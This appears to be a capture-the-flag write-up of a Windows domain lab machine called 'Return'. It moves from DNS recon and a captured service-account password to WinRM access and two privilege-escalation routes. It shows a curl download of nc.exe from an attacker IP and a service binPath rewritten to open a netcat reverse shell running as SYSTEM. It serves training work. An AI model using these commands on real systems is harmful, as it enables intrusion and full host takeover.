Return
Recon
DNS (53)
└─$ dig ANY return.local @10.129.95.241
; <<>> DiG 9.19.21-1-Debian <<>> ANY return.local @10.129.95.241
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40410
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: e0aecc3fd2bd8c99 (echoed)
;; QUESTION SECTION:
;return.local. IN ANY
;; ANSWER SECTION:
return.local. 600 IN A 10.129.95.241
return.local. 3600 IN NS printer.return.local.
return.local. 3600 IN SOA printer.return.local. hostmaster.return.local. 123 900 600 86400 3600
return.local. 600 IN AAAA dead:beef::247
;; ADDITIONAL SECTION:
printer.return.local. 1200 IN A 10.129.95.241
printer.return.local. 1200 IN AAAA dead:beef::1d65:68c2:f133:61bd
printer.return.local. 1200 IN AAAA dead:beef::1f6
;; Query time: 84 msec
;; SERVER: 10.129.95.241#53(10.129.95.241) (TCP)
;; WHEN: Wed Nov 27 12:50:27 EST 2024
;; MSG SIZE rcvd: 238HTTP (80)
POST request contains ip address and that's it, SSRF?
└─$ listen 389
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:389
Ncat: Listening on 0.0.0.0:389
Ncat: Connection from 10.129.95.241:61747.
0*`%return\svc-printer
0*`%return\svc-printer
1edFg43012!!WinRM (svc-printer)
└─$ netexec smb 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.129.95.241 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
SMB 10.129.95.241 445 PRINTER [*] Enumerated shares
SMB 10.129.95.241 445 PRINTER Share Permissions Remark
SMB 10.129.95.241 445 PRINTER ----- ----------- ------
SMB 10.129.95.241 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.129.95.241 445 PRINTER C$ READ,WRITE Default share
SMB 10.129.95.241 445 PRINTER IPC$ READ Remote IPC
SMB 10.129.95.241 445 PRINTER NETLOGON READ Logon server share
SMB 10.129.95.241 445 PRINTER SYSVOL READ Logon server share
└─$ netexec winrm 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.129.95.241 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.129.95.241 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)└─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer> whoami /all
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledUser.txt
*Evil-WinRM* PS C:\Users\svc-printer> ls $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/27/2024 10:05 AM 34 user.txt
68f6758bf7c0c46e0afa1683db90ef69Privilege Escalation
Cicada had similar privilege escalation path, more details there. [Cicada](
)
Root.txt (Path 1)
*Evil-WinRM* PS C:\Users\svc-printer> robocopy /b C:\Users\Administrator\Desktop C:\Users\svc-printer root.txt
*Evil-WinRM* PS C:\Users\svc-printer> cat root.txt
4ad8c7c517a0a92c4c1a3920ff2b8373Root.txt (Path 2)
User is part of Server Operators group; The group has full control over certain services, allowing for the execution of arbitrary commands and privilege escalation (source)
Windows Privilege Escalation: Server Operator Group
*Evil-WinRM* PS C:\Users\svc-printer> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc*Evil-WinRM* PS C:\Users\svc-printer\Music> curl 10.10.14.99/nc.exe -out nc.exe
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe config VMTools binPath="C:\Users\svc-printer\Music\nc.exe -e powershell.exe 10.10.14.99 4444"
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe stop VMTools
*Evil-WinRM* PS C:\Users\svc-printer\Music> sc.exe start VMTools
---
└─$ listen
Ncat: Connection from 10.129.95.241:62800.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\systemLast updated